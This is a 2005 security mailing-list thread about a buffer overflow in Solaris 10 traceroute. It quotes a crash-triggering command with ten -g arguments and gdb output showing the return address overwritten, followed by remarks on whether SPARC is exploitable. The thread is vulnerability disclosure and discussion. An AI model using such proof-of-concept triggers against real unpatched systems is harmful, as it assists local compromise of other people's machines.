<<< Date Index >>>     <<< Thread Index >>>

Re: Solaris 10 /usr/sbin/traceroute vulnerabilities



Hello,

Please note his tests were on X86, SPARC needs double ret in order to successfuly xploit/segfault the vulnearable program due to register windows layout on stack.

Its like xfont (x-something, don't remember) issues on old solaris, exploitable (segfault) on x86 but not on SPARC because it does exit after the first ret, so there is no double ret chance.

Best regards,

David T. Moraski II wrote:
On Fri, 24 Jun 2005, Przemyslaw Frasunek wrote:


/usr/sbin/traceroute from Solaris 10 is vulnerable to buffer overflow in
handling -g argument. After supplying 10 -g parameters, return address is
overwritten by IP address argument:

atari:root:/home/venglin# /usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g
7 -g 8 -g 9 -g 10 127.0.0.1
traceroute: too many IPv4 gateways
traceroute: unknown IPv4 host 1
traceroute to 127.0.0.1 (127.0.0.1), 30 hops max, 88 byte packets
Segmentation fault (core dumped)

atari:root:/home/venglin# gdb /usr/sbin/traceroute core
[...]
Core was generated by `/usr/sbin/traceroute -g 1 -g 2 -g 3 -g 4 -g 5 -g 6 -g 7
-g 8 -g 9 -g 10 127.0.0'.
Program terminated with signal 11, Segmentation fault.
[...]
#0  0x0100007f in ?? ()

0x0100007f is of course 127.0.0.1.


I ran the above command line on a Solaris 10 system, both as root and a
regular user, and was unable to reproduce your results; traceroute did not
segfault or produce a core file.  What was your patch level?


--
Femín J. Serna @ NGSEC
http://www.ngsec.com

C\O´Donnell nº 46, 3ºB
28009 Madrid
Spain
Telf.: +34 91 435 56 27
Fax.: +34 91 577 84 45